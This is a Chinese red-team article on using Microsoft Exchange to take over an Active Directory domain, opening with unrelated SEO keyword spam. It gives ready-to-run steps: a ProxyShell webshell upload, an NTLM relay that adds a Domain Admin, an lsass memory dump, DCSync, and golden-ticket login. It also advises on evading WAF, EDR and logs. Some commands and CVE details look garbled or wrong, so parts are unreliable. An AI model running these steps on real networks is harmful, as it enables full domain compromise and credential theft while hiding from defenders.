国外设计网站pinterest网址,一 通过网站推广品牌,个人网页内容需要哪些,做户外的网站在企业AD域架构中#xff0c;Exchange Server作为核心邮件服务与域内特权组件#xff0c;其安全边界直接决定整个AD域的防御强度#xff0c;是渗透测试与红队攻击中优先级最高的“突破口”。不同于普通域内服务器#xff0c;Exchange天生具备域级特权配置、公网暴露面广、权…在企业AD域架构中Exchange Server作为核心邮件服务与域内特权组件其安全边界直接决定整个AD域的防御强度是渗透测试与红队攻击中优先级最高的“突破口”。不同于普通域内服务器Exchange天生具备域级特权配置、公网暴露面广、权限链路复杂等特点一旦被攻陷攻击者可借助其内置特权组快速横向移动、提权至域控实现全域接管。本文将从Exchange在AD域中的核心定位出发全面拆解其攻击面矩阵、深挖高频漏洞原理、精细化复现实战链路同时结合当前攻击技术趋势提出前瞻性防御策略为企业安全运营与渗透测试人员提供全面参考。一、Exchange在AD域中的核心地位与攻击价值深度解析Exchange Server并非孤立的邮件服务器其与AD域深度绑定从安装部署阶段就被赋予了远超普通服务器的域级权限这种“特权属性”使其成为AD域渗透的“必争之地”其攻击价值远超单一服务器攻陷核心体现在特权配置、链路枢纽、暴露面三个维度。1. 域内特权配置深度解析攻击核心诱因Exchange安装过程中会自动在AD域中创建多个特权组与对象形成默认的高权限链路这些配置看似为了服务正常运行实则成为攻击者提权的“捷径”核心特权组件如下Exchange Trusted SubsystemETS组这是Exchange最核心的特权组Exchange服务器的本地SYSTEM账户、Exchange服务账户会默认加入该组。ETS组被授予对Exchange组织内所有服务器、邮箱数据库、AD域对象的广泛访问权限可直接读取、修改Exchange相关的AD属性是连接Exchange服务器与AD域的“权限桥梁”。Exchange Windows PermissionsEWP组攻击利用的核心焦点该组默认拥有AD域对象的WriteDACL权限访问控制列表写入权限。这意味着任何属于EWP组的账户包括Exchange机器账户都可修改域内任意对象包括域控、域管理员账户的权限例如添加DCSync权限、重置域管理员密码直接实现域控接管。Organization Management组Exchange组织的最高权限组该组成员可完全控制Exchange服务器的所有配置如创建管理员、修改服务配置同时默认具备部分AD域管理权限若攻击者获取该组权限可快速横向渗透至AD域核心。Exchange机器账户Exchange服务器以本地SYSTEM权限运行其对应的域机器账户格式为EXCHANGESERVER$默认加入ETS组间接继承EWP组的域级权限。机器账户的哈希值一旦被窃取可直接用于Pass-the-HashPtH攻击无需明文密码即可访问域内资源。2. 典型攻击链路全景从公网到域控的完整闭环Exchange的攻击链路具有“入口多样、链路简短、权限跃升快”的特点结合当前红队实战场景主流链路可分为三类覆盖公网入口、内网横向、权限提权全流程其中公网入口链路最具威胁性公网入口→全域接管最主流公网暴露OWAOutlook Web App/ECPExchange Control Panel/EWSExchange Web Services接口 → 利用无凭据漏洞ProxyLogon/ProxyShell实现RCE → 获取Exchange服务器SYSTEM权限 → 窃取机器账户哈希 → 利用EWP组WriteDACL提权 → 域控DCSync攻击 → 导出krbtgt哈希制作黄金票据 → 全域接管。内网横向→Exchange攻陷→域控接管内网渗透获取普通域账号 → 利用有凭据漏洞ECP ViewState反序列化/NTLM中继攻陷Exchange → 提升至Organization Management权限 → 借助ETS/EWP组权限横向至域控 → 域控接管。权限滥用→持久化接管攻陷Exchange后 → 利用权限添加隐藏管理员账户/部署后门如Exchange邮件后门、组策略后门 → 维持长期控制 → 后续逐步渗透域内其他服务器实现全域持久化。3. 攻击价值核心总结Exchange的攻击价值本质是“特权复用”——无需复杂的权限绕过仅需利用其默认的域级特权配置即可从单一服务器快速跃升为域级控制。相较于其他域内目标如文件服务器、应用服务器Exchange具备“一键提权至域控”的独特优势同时其公网暴露面广、漏洞频发成为红队攻击中“以点破面”的最佳跳板。二、Exchange核心攻击面全景拆解按利用条件技术分类含前瞻攻击方向Exchange的攻击面覆盖“无凭据、有凭据、权限提权、持久化”四大维度结合近年来漏洞披露趋势与红队实战技术我们将攻击面进一步细化为6大类不仅包含传统高频攻击方式还新增当前新兴的攻击方向全面覆盖已知与潜在威胁。一无凭据攻击无需邮箱账号/域账号直接突破公网首选无凭据攻击是Exchange最具威胁的攻击类型攻击者无需获取任何合法凭据仅需借助公网暴露的Exchange接口利用漏洞直接实现RCE或凭据窃取是公网渗透Exchange的“首选路径”核心漏洞与技术如下1. ProxyLogon系列漏洞CVE-2021-26855/26857/26858/26859ProxyLogon是2021年披露的Exchange重大漏洞组合被称为“Exchange史上最严重漏洞”全球大量企业遭受攻击至今仍有部分未打补丁的服务器存在被利用风险。影响范围Exchange 2013所有版本、Exchange 2016CU1至CU18、Exchange 2019CU1至CU7未安装2021年3月累积更新CU及安全补丁的服务器均受影响。漏洞原理核心是“前端CAS代理认证绕过”——Exchange前端CAS客户端访问服务器与后端Mailbox服务器之间的代理机制存在缺陷攻击者可构造特殊的HTTP请求绕过前端认证校验直接访问后端Exchange Management ShellEMS接口进而实现无凭据RCE。该漏洞组合包含4个漏洞分别实现“认证绕过、权限提升、命令执行”的完整链路。利用特点利用门槛极低仅需Exchange公网地址开放443端口无需任何凭据可直接上传webshell、执行系统命令获取Exchange服务器SYSTEM权限利用工具成熟如ProxyLogon-Exploit、Orange自动化程度高攻击者可批量扫描利用。2. ProxyShell系列漏洞CVE-2021-34473/34522/34469ProxyShell是2021年7月披露的另一组重大无凭据漏洞弥补了ProxyLogon补丁后的攻击缺口成为后续公网渗透Exchange的主流漏洞其利用方式更隐蔽、绕过补丁更容易。影响范围Exchange 2013CU23及之前、Exchange 2016CU19及之前、Exchange 2019CU8及之前未安装2021年7月及之后补丁的服务器受影响。漏洞原理采用“SSRF 权限绕过 反序列化”的组合利用方式① Autodiscover接口存在SSRF漏洞CVE-2021-34473可触发Exchange服务器向攻击者控制的地址发起请求② EWS接口存在权限绕过CVE-2021-34522可绕过权限校验访问后端接口③ ECP接口存在反序列化漏洞CVE-2021-34469可执行恶意.NET代码最终实现无凭据写文件RCE。利用特点相较于ProxyLogonProxyShell的利用更隐蔽可通过/autodiscover/autodiscover.json等不易被监控的接口触发且部分补丁存在绕过方法可直接写入webshell到aspnet_client等默认存在的目录无需创建新目录降低被检测风险。3. ProxyOracle系列漏洞CVE-2021-31195/31196ProxyOracle属于“无凭据凭据窃取”漏洞不同于直接RCE其核心目标是获取Exchange用户凭据进而横向渗透适合对防护较严格、无法直接RCE的Exchange服务器发起攻击。漏洞原理① OWA接口存在XSS漏洞CVE-2021-31195可诱导用户点击恶意链接窃取用户的Exchange Cookie② Exchange的Cookie加密机制存在缺陷填充Oracle攻击CVE-2021-31196攻击者可通过窃取的Cookie利用填充Oracle攻击解密Cookie内容获取用户的NTLM哈希或明文凭据。利用特点需要诱导Exchange用户如域管理员、普通员工点击恶意链接属于“社会工程学技术漏洞”的组合利用获取凭据后可进一步利用有凭据漏洞攻陷Exchange或直接用于内网横向移动。4. 新兴无凭据攻击方向前瞻随着Exchange补丁的不断完善传统无凭据RCE漏洞逐渐减少攻击者开始转向“更隐蔽、更难检测”的无凭据攻击方向目前值得重点关注的有两类Exchange接口畸形请求DoS权限绕过通过构造畸形的HTTP请求使Exchange服务崩溃或进入异常状态进而绕过认证机制实现低权限访问或RCE此类攻击难以被传统WAF检测因为请求格式看似合法仅参数存在异常。Exchange邮件协议漏洞利用针对SMTP/POP3/IMAP等邮件协议的漏洞无需通过OWA/ECP接口直接利用邮件协议发起无凭据攻击窃取邮箱数据或执行命令此类攻击可绕过针对HTTP接口的防护隐蔽性极强。二有凭据攻击需普通邮箱/域账号内网主流有凭据攻击主要应用于内网渗透场景攻击者已获取普通域账号或Exchange邮箱账号如通过钓鱼、内网扫描获取借助Exchange的接口漏洞或权限配置实现权限提升或服务器攻陷核心攻击方式如下1. SSRF NTLM中继/反射CVE-2018-8581及衍生利用这是内网渗透Exchange最经典、最常用的攻击方式利用Exchange的SSRF漏洞触发NTLM认证中继实现“低权限凭据→高权限访问”的跃升无需直接攻击Exchange服务器隐蔽性极高。漏洞原理Exchange的EWP/ECP/Autodiscover等接口存在SSRF漏洞最典型为CVE-2018-8581攻击者可构造特殊的SOAP/XML请求诱导Exchange服务器以SYSTEM/机器账户权限运行向攻击者控制的服务器发起NTLM认证攻击者捕获该NTLM认证信息后中继到域控的LDAP/SMB接口利用中继的高权限Exchange机器账户权限执行恶意操作如添加域管理员、修改域权限。利用条件拥有普通Exchange邮箱账号或域账号用于触发SSRF请求Exchange服务器与域控之间网络可达域控未开启NTLM中继防护如SMB签名、LDAP签名。衍生利用目前该攻击方式已衍生出“NTLM反射攻击”攻击者无需控制中继服务器直接将Exchange服务器的NTLM认证反射回自身实现权限提升可绕过部分中继防护机制。2. ECP ViewState反序列化CVE-2020-0688该漏洞属于“低权限→高权限RCE”的典型漏洞仅需拥有ECP接口访问权限的普通用户账号即可直接实现Exchange服务器RCE是内网渗透中“快速攻陷Exchange”的首选方式。漏洞原理Exchange ECP接口的ViewState参数采用硬编码的validationKey和decryptionKey进行加密和解密所有Exchange服务器的默认密钥相同微软官方硬编码攻击者可利用已知的密钥构造恶意的ViewState参数通过反序列化漏洞执行.NET代码实现RCE。利用特点利用门槛极低仅需普通用户账号登录ECP接口或直接构造包含恶意ViewState的请求漏洞利用无需依赖Exchange版本部分旧版本未修复且利用工具成熟如ysoserial.NET可快速执行命令。3. NTLM Relay到Exchange后端CVE-2022-24477该漏洞属于“中继攻击的进阶利用”针对Exchange后端接口的权限配置缺陷将普通用户的NTLM认证中继到Exchange后端实现权限提升至Organization Management组进而实现RCE。漏洞原理Exchange后端的ECP接口存在权限校验缺陷当攻击者中继普通用户的NTLM认证到后端ECP接口时接口会错误地将该用户提升为Organization Management组权限攻击者利用该高权限可执行Exchange管理命令实现RCE如创建后门账号、执行系统命令。利用特点无需高权限凭据仅需普通用户的NTLM哈希或明文密码可绕过Exchange前端的权限控制直接攻击后端接口隐蔽性强适合对前端防护较严格但后端未做防护的Exchange环境。4. 邮箱凭据滥用非漏洞实战高频除了漏洞利用攻击者还会直接滥用获取的Exchange邮箱凭据实现渗透目标此类方式无需依赖漏洞更难被检测核心滥用方式如下OWA/ECP登录横向使用获取的邮箱凭据登录OWA/ECP接口查看用户邮件获取域内敏感信息如域管理员账号、服务器地址、业务流程为后续渗透提供支撑若登录的是管理员邮箱可直接通过ECP接口修改Exchange配置植入后门。Pass-the-Cookie攻击窃取用户的OWA登录Cookie无需凭据即可登录用户邮箱或利用Cookie绕过认证访问Exchange其他接口发起进一步攻击。三权限提升从Exchange到AD域控核心链路攻陷Exchange服务器后攻击者的核心目标是接管AD域控而Exchange的默认特权配置的为权限提升提供了“捷径”核心提权路径有4类覆盖“快速提权、隐蔽提权、持久化提权”结合实战场景重点解析1. EWP/ETS组WriteDACL提权最常用、最快路径这是从Exchange到域控的“黄金提权路径”无需复杂漏洞仅需利用Exchange默认的权限配置即可快速实现域控接管是红队实战中最首选的提权方式。提权链路Exchange机器账户SYSTEM权限→ 加入ETS组 → 间接继承EWP组权限 → EWP组拥有域对象WriteDACL权限 → 攻击者利用该权限为自身控制的账号如恶意创建的账号、窃取的普通账号添加DCSync权限 → 通过DCSync攻击导出域内所有用户哈希包括krbtgt哈希 → 制作黄金票据 → 登录域控实现全域接管。关键细节① 机器账户的哈希可通过抓取lsass进程内存获取如使用procdumpmimikatz② 提权过程无需与域控直接交互可通过LDAP接口远程修改权限隐蔽性强③ 即使Exchange服务器不是域控也可通过该路径接管域控因为EWP组的权限是域级的。2. DNSAdmins组滥用提权隐蔽路径该路径适合对“防护较严格、DCSync攻击易被检测”的环境利用Exchange对DNSAdmins组的控制权限实现域控接管隐蔽性远高于DCSync攻击。提权链路EWP组默认拥有对DNSAdmins组的控制权可添加成员 → 攻击者利用Exchange机器账户权限将自身控制的账号添加到DNSAdmins组 → DNSAdmins组成员可修改域控的DNS服务配置 → 通过修改DNS服务的加载模块如添加恶意DLL在域控上执行SYSTEM权限代码 → 接管域控。优势与风险优势是攻击行为隐蔽修改DNS配置的操作不易被常规安全监控检测风险是需要Exchange服务器与域控的DNS服务端口53端口可达且DNSAdmins组的权限未被收敛。3. Exchange服务权限滥用提权持久化路径该路径主要用于“持久化控制”攻击者攻陷Exchange后通过滥用Exchange服务的权限实现长期控制Exchange服务器同时逐步提权至域控适合需要长期驻留的红队场景。提权方式① 篡改Exchange服务的启动项如Exchange Information Store服务添加恶意启动参数实现开机自启后门② 利用Exchange服务的高权限SYSTEM部署进程注入后门监控域内流量窃取更多凭据③ 修改Exchange的组策略配置将恶意脚本推送到域内其他服务器实现横向移动。4. 新兴提权方向Exchange AD对象权限滥用前瞻随着权限收敛策略的普及传统的EWP组WriteDACL提权逐渐被防御攻击者开始转向“更细致的AD对象权限滥用”目前重点关注的方向是利用Exchange对AD中“Exchange Organization”对象的控制权修改该对象的权限进而继承域级高权限或滥用Exchange的“MS-Exch-Recipient-Administrator”权限修改域内用户的属性实现权限提升。此类攻击更隐蔽需要对Exchange与AD的权限关系有深入了解是未来提权攻击的主流趋势。四邮箱数据窃取攻击核心目标之一除了接管AD域窃取邮箱数据也是攻击者的核心目标之一如企业商业机密、员工隐私、敏感业务数据Exchange的邮箱数据窃取攻击可分为“直接窃取”和“间接窃取”两类覆盖不同场景直接窃取① 攻陷Exchange服务器后直接访问邮箱数据库EDB文件通过工具如Eseutil、Kernel Exchange Recovery导出邮箱数据② 利用Exchange管理命令如New-MailboxExportRequest将目标邮箱数据导出为PST文件远程下载③ 通过OWA/ECP登录目标邮箱直接下载邮件、附件。间接窃取① 配置邮箱转发规则如通过ECP接口或PowerShell命令将目标邮箱的新邮件自动转发到攻击者控制的邮箱② 利用Exchange的“邮件跟踪”功能监控目标邮箱的邮件往来获取敏感信息③ 窃取邮箱备份文件如Exchange数据库备份、PST备份离线解析邮箱数据。五持久化攻击攻陷后长期控制攻击者攻陷Exchange后为了避免被发现、实现长期控制会部署多种持久化后门结合Exchange的特性核心持久化方式如下兼顾隐蔽性与稳定性Exchange后门账号利用Organization Management权限创建隐藏的Exchange管理员账号修改账号属性隐藏在AD中即使原管理员账号被重置攻击者仍可通过该后门账号登录Exchange。邮件后门修改Exchange的传输代理Transport Agent植入恶意代理实现邮件监控、邮件窃取或邮件伪造此类后门与Exchange服务深度绑定不易被发现且重启服务后仍能正常运行。权限持久化利用EWP组的权限为自身控制的账号添加“永久DCSync权限”或“DNSAdmins组永久成员”即使Exchange服务器被修复攻击者仍可通过该账号快速接管域控。进程注入后门将恶意代码注入到Exchange的核心服务进程如w3wp.exe、store.exe进程重启后后门自动恢复且难以通过常规进程监控发现。六防御绕过攻击前瞻重点关注随着企业对Exchange安全防护的加强如部署WAF、开启补丁更新、权限收敛攻击者开始重点研究“防御绕过技术”目前值得重点关注的防御绕过方向如下体现攻击技术的前瞻性WAF绕过通过构造畸形请求、编码绕过如URL编码、Base64编码、分块传输绕过等方式绕过WAF对Exchange漏洞利用请求的检测或利用WAF的规则缺陷构造特殊请求触发WAF误判进而实现攻击。补丁绕过针对微软发布的Exchange漏洞补丁寻找补丁绕过方法如漏洞变种、权限绕过例如ProxyLogon、ProxyShell漏洞均存在多个补丁绕过版本攻击者可通过这些方法攻击已打补丁的Exchange服务器。监控绕过通过修改攻击行为特征如修改webshell文件名、命令执行方式绕过安全监控工具如EDR、SIEM的检测或利用Exchange的合法命令如PowerShell命令执行恶意操作伪装成正常业务操作规避监控告警。三、核心漏洞实战复现精细化步骤含环境配置问题排查可直接落地本节选取Exchange攻击中最常用、最具代表性的3类漏洞/攻击方式ProxyShell无凭据RCE、SSRFNTLM中继到LDAP、EWP组提权到域控结合实战环境提供精细化复现步骤包含环境准备、工具安装、命令执行、问题排查确保渗透测试人员可直接落地复现同时补充实战中的注意事项提升复现成功率。一复现环境准备标准化配置避免环境差异导致复现失败复现环境采用“域环境Exchange服务器攻击机”的经典架构所有环境版本均选用实战中最常见、漏洞易复现的版本具体配置如下1. 域环境配置系统版本Windows Server 2019 Standard桌面体验版角色域控制器DC域名为test.com域控主机名DC01IP地址192.168.10.10关键配置关闭Windows防火墙、关闭SMB签名、关闭LDAP签名便于NTLM中继创建普通域用户test密码Pssw0rd123用于测试有凭据攻击。2. Exchange服务器配置系统版本Windows Server 2019 Standard桌面体验版Exchange版本Exchange Server 2019 CU8未安装2021年7月补丁确保ProxyShell漏洞存在网络配置加入test.com域主机名EXCH01IP地址192.168.10.20开放80、443、5985、445等端口Exchange核心端口。关键配置安装OWA/ECP/EWS接口默认安装确保公网可访问测试环境可通过端口映射模拟关闭IE增强安全配置避免影响漏洞利用。3. 攻击机配置系统版本Kali Linux 2024.1IP地址192.168.10.30与域环境、Exchange服务器同网段必备工具proxyshell-exchangeProxyShell漏洞利用工具、impacket含ntlmrelayx、secretsdump、ticketer等工具、bloodyADAD权限操作工具、mimikatz凭据窃取工具、procdump64Windows进程内存导出工具、curl请求发送工具。工具安装命令Kali终端执行# 安装impacketgit clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip3 install .安装proxyshell-exchangegit clone https://github.com/dirkjanm/proxyshell-exchange.git安装bloodyADgit clone https://github.com/CravateRouge/bloodyAD.gitcd bloodyADpip3 install -r requirements.txt安装mimikatzKali自带若没有执行apt-get install mimikatz -y4. 环境测试复现前需确认环境连通性避免因网络问题导致复现失败攻击机ping域控192.168.10.10和Exchange服务器192.168.10.20确保网络可达。攻击机通过curl访问Exchange的OWA接口curl -k https://192.168.10.20/owa/若返回OWA登录页面说明接口正常开放。确认Exchange版本访问https://192.168.10.20/owa/auth/version.txt查看版本是否为Exchange 2019 CU8确保漏洞存在。二复现1ProxyShell无凭据RCE公网首选无凭据直接拿SYSTEM复现目标利用ProxyShell漏洞无凭据写入webshell到Exchange服务器获取SYSTEM权限核心步骤分为“信息收集→漏洞利用→webshell访问→权限确认”补充实战中的问题排查方法。步骤1信息收集确认漏洞可利用性信息收集的核心是确认Exchange服务器的版本、开放接口判断ProxyShell漏洞是否存在执行以下命令攻击机Kali终端# 1. 扫描Exchange服务器核心端口80、443确认接口开放nmap -p80,443192.168.10.20# 2. 获取Exchange版本关键确认是否为漏洞影响版本curl-k https://192.168.10.20/owa/auth/version.txt# 3. 测试Autodiscover接口ProxyShell漏洞触发接口是否可用curl-k https://192.168.10.20/autodiscover/autodiscover.json预期结果① 80、443端口开放② version.txt返回版本为15.2.986.0Exchange 2019 CU8版本号③ Autodiscover接口返回JSON格式内容说明接口正常。步骤2利用ProxyShell漏洞写入webshell使用proxyshell-exchange工具构造恶意请求写入webshell到Exchange服务器的aspnet_client目录该目录默认存在无需创建且不易被检测执行以下命令# 进入ProxyShell工具目录cdproxyshell-exchange# 执行漏洞利用写入webshellshell.aspx为webshell文件名可自定义python3 proxyshell.py -u https://192.168.10.20 -o shell.aspx关键参数说明-u 指定Exchange服务器的HTTPS地址-o 指定写入的webshell文件名。预期结果工具输出“Shell uploaded successfully!”说明webshell写入成功若输出失败可尝试以下排查方法① 确认Exchange版本是否正确未打2021年7月补丁② 检查网络连通性确保攻击机可访问Exchange的443端口③ 更换webshell文件名避免被杀毒软件拦截。步骤3访问webshell获取SYSTEM权限webshell写入成功后通过浏览器或curl访问webshell执行系统命令获取Exchange服务器的SYSTEM权限浏览器访问webshell地址https://192.168.10.20/aspnet_client/shell.aspx注意aspnet_client目录默认存在无需手动创建。webshell默认包含命令执行功能输入whoami命令预期返回nt authority\system说明获取SYSTEM权限。可选执行ipconfig、net user等命令查看Exchange服务器的网络配置、域内用户信息为后续提权做准备。注意实战中为了避免webshell被检测可对webshell进行加密如ASPX加密或修改webshell的文件名、路径降低被发现风险。三复现2SSRF NTLM中继到LDAP内网主流低权限→域管理员复现目标利用Exchange的SSRF漏洞触发Exchange机器账户的NTLM认证中继到域控的LDAP接口添加域管理员账号实现从普通用户到域管理员的权限跃升核心步骤分为“启动中继服务→触发SSRF→验证中继结果”。步骤1攻击机启动NTLM中继服务目标域控LDAP使用impacket工具集中的ntlmrelayx.py启动NTLM中继服务将捕获到的NTLM认证中继到域控的LDAP接口执行添加域管理员的命令执行以下命令攻击机Kali终端# 启动NTLM中继目标为域控的LDAP接口执行添加域管理员命令ntlmrelayx.py -t ldap://192.168.10.10 -smb2support --no-http-server --no-wcf-server -cnet user attacker Pssw0rd123 /add net group\Domain Admins\attacker /add关键参数说明-t ldap://192.168.10.10指定中继目标为域控的LDAP接口LDAP默认端口389。-smb2support启用SMB2协议支持避免因协议不兼容导致中继失败。–no-http-server --no-wcf-server关闭HTTP和WCF服务器仅监听NTLM认证请求减少暴露面。-c “命令”指定中继成功后执行的命令此处为添加用户attacker密码Pssw0rd123并将其加入Domain Admins组域管理员组。预期结果ntlmrelayx.py启动成功输出“Relay server is running”等待捕获NTLM认证请求。步骤2触发Exchange的SSRF漏洞发送NTLM认证请求使用普通域用户test的凭据构造SOAP请求访问Exchange的EWS接口触发SSRF漏洞诱导Exchange服务器机器账户权限向攻击机发起NTLM认证执行以下命令攻击机Kali终端新打开一个终端# 构造SSRF请求触发NTLM认证替换test:test为普通域用户凭据curl-khttps://192.168.10.20/ews/exchange.asmx-d?xml version1.0 encodingutf-8? soap:Envelope xmlns:xsihttp://www.w3.org/2001/XMLSchema-instance xmlns:mhttp://schemas.microsoft.com/exchange/services/2006/messages xmlns:thttp://schemas.microsoft.com/exchange/services/2006/types xmlns:soaphttp://schemas.xmlsoap.org/soap/envelope/ soap:Body m:GetUserOofSettingsRequest t:Mailbox t:Addresstesttest.com/t:Address /t:Mailbox /m:GetUserOofSettingsRequest /soap:Body /soap:Envelope-HAuthorization: Basic$(echo-ntest:Pssw0rd123|base64)关键说明① Authorization: Basic 后面的内容是普通域用户test的凭据用户名:密码经过Base64编码后的结果② 该请求会触发Exchange的EWS接口发起SSRF向攻击机发送NTLM认证请求。步骤3验证中继结果确认域管理员添加成功当中继成功后ntlmrelayx.py会输出“Relay successful”的提示此时登录域控验证attacker用户是否已添加为域管理员登录域控DC01192.168.10.10打开命令提示符CMD。执行命令net user attacker查看用户是否存在预期返回用户attacker的详细信息。执行命令net group Domain Admins查看域管理员组成员预期attacker用户在列表中。问题排查若中继失败可检查以下几点① 域控是否关闭了LDAP签名开启LDAP签名会阻止中继② 普通域用户凭据是否正确③ 攻击机与域控、Exchange服务器的网络是否可达④ 命令中的域管理员组名称是否正确英文双引号不可省略。四复现3EWP组提权从Exchange到域控全域接管复现目标利用Exchange机器账户的权限继承EWP组WriteDACL权限为attacker用户添加DCSync权限通过DCSync攻击导出krbtgt哈希制作黄金票据登录域控实现全域接管核心步骤分为“窃取机器账户哈希→添加DCSync权限→DCSync导出哈希→制作黄金票据→登录域控”。步骤1窃取Exchange机器账户哈希Exchange服务器上执行Exchange机器账户EXCH01$的哈希是提权的核心需在Exchange服务器上导出lsass进程内存再通过mimikatz解析出机器账户哈希步骤如下将procdump64.exe工具上传到Exchange服务器可通过webshell上传或共享文件夹复制。打开Exchange服务器的命令提示符CMD切换到procdump64.exe所在目录执行以下命令导出lsass进程内存procdump64.exe -accepteula -ma lsass.exe lsass.dmp说明-accepteula 自动接受许可协议-ma 导出完整的进程内存lsass.dmp 是导出的内存文件名称。将lsass.dmp文件下载到攻击机可通过webshell下载或共享文件夹复制。攻击机执行mimikatz解析lsass.dmp文件获取机器账户哈希mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full exit预期结果输出中找到“EXCH01$”Exchange机器账户的NTLM哈希格式为“NTLM: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx”记录该哈希值后续使用。步骤2利用bloodyAD添加DCSync权限攻击机执行使用bloodyAD工具通过Exchange机器账户的哈希远程连接AD域为attacker用户添加DCSync权限DCSync权限是导出域内用户哈希的核心权限执行以下命令# 进入bloodyAD工具目录cdbloodyAD# 为attacker用户添加DCSync权限替换参数为实际值python3 bloodyAD.py -d test.com -u EXCH01$ -p :机器账户哈希--host192.168.10.10 add-dcsync attacker关键参数说明-d test.com指定AD域名称。-u EXCH01指定Exchange机器账户名称注意末尾的指定Exchange机器账户名称注意末尾的指定Exchange机器账户名称注意末尾的符号不可省略。-p :机器账户哈希指定机器账户的NTLM哈希冒号不可省略前面为空表示使用哈希登录无需明文密码。–host 192.168.10.10指定域控的IP地址。add-dcsync attacker为attacker用户添加DCSync权限。预期结果工具输出“DCSync rights added successfully to attacker”说明DCSync权限添加成功。步骤3DCSync攻击导出krbtgt哈希攻击机执行使用impacket工具集中的secretsdump.py通过attacker用户的凭据执行DCSync攻击导出域内krbtgt用户的哈希krbtgt是制作黄金票据的核心执行以下命令# DCSync导出krbtgt哈希替换参数为实际值secretsdump.py test.com/attacker:Pssw0rd123192.168.10.10 -just-dc-user krbtgt关键参数说明test.com/attacker:Pssw0rd123指定域名称、attacker用户及其密码。192.168.10.10指定域控的IP地址。-just-dc-user krbtgt仅导出krbtgt用户的哈希减少输出内容提高效率。预期结果工具输出krbtgt用户的NTLM哈希和LM哈希记录NTLM哈希值后续制作黄金票据使用。步骤4制作黄金票据登录域控攻击机执行使用impacket工具集中的ticketer.py利用krbtgt哈希和域SID制作黄金票据通过黄金票据登录域控实现全域接管获取域SID执行以下命令获取test.com域的SIDsecretsdump.py test.com/attacker:Pssw0rd123192.168.10.10 -just-dc-user administrator输出中“Domain SID”后面的内容即为域SID格式为S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx记录该SID。制作黄金票据执行以下命令生成administrator用户的黄金票据administrator是域管理员账号# 制作黄金票据替换参数为实际值 ticketer.py -nthash krbtgt哈希 -domain-sid 域SID -domain test.com administrator预期结果生成administrator.ccache文件黄金票据文件保存在当前目录。使用黄金票据登录域控执行以下命令加载黄金票据远程登录域控# 加载黄金票据export KRB5CCNAMEadministrator.ccache远程登录域控执行命令验证权限psexec.py test.com/administrator192.168.10.10 -k -no-pass cmd 关键参数说明-k 表示使用Kerberos认证黄金票据-no-pass 表示无需输入密码。预期结果成功登录域控的CMD界面执行whoami命令返回test\administrator说明已实现域控接管此时可执行任意系统命令如查看域内用户、修改域管理员密码实现全域控制。五复现注意事项实战重点复现环境需与实战环境保持一致避免因版本、配置差异导致复现失败尤其是Exchange版本必须选用漏洞影响范围内的版本。实战中需注意隐藏攻击行为避免被安全监控检测如修改webshell名称、清理日志、使用加密通信。DCSync攻击、黄金票据攻击属于高风险操作会触发域控的安全告警实战中需谨慎使用可优先选择DNSAdmins组滥用等隐蔽提权路径。工具版本需匹配避免因工具版本过低导致漏洞利用失败如impacket工具建议使用最新版本。四、从Exchange接管AD域的完整链路与实战技巧红队视角结合前文的攻击面分析与漏洞复现本节从红队实战视角梳理从Exchange接管AD域的完整链路补充实战中的技巧、避坑点与优化方案帮助渗透测试人员快速落地实战提高攻击成功率同时覆盖不同防护强度环境的适配策略。一完整攻击链路红队实战标准化流程红队实战中从Exchange接管AD域的链路需遵循“隐蔽性、高效性、持久性”原则标准化流程分为5个阶段每个阶段明确核心目标、操作步骤与注意事项形成完整闭环阶段1入口获取核心快速突破避免暴露核心目标获取Exchange服务器的初始权限SYSTEM或普通管理员权限优先选择无凭据攻击减少凭据依赖降低暴露风险。……接下来的内容请阅读《AD域渗透“黄金跳板”深度剖析Exchange攻击面全景研究、漏洞复现与前瞻防御下》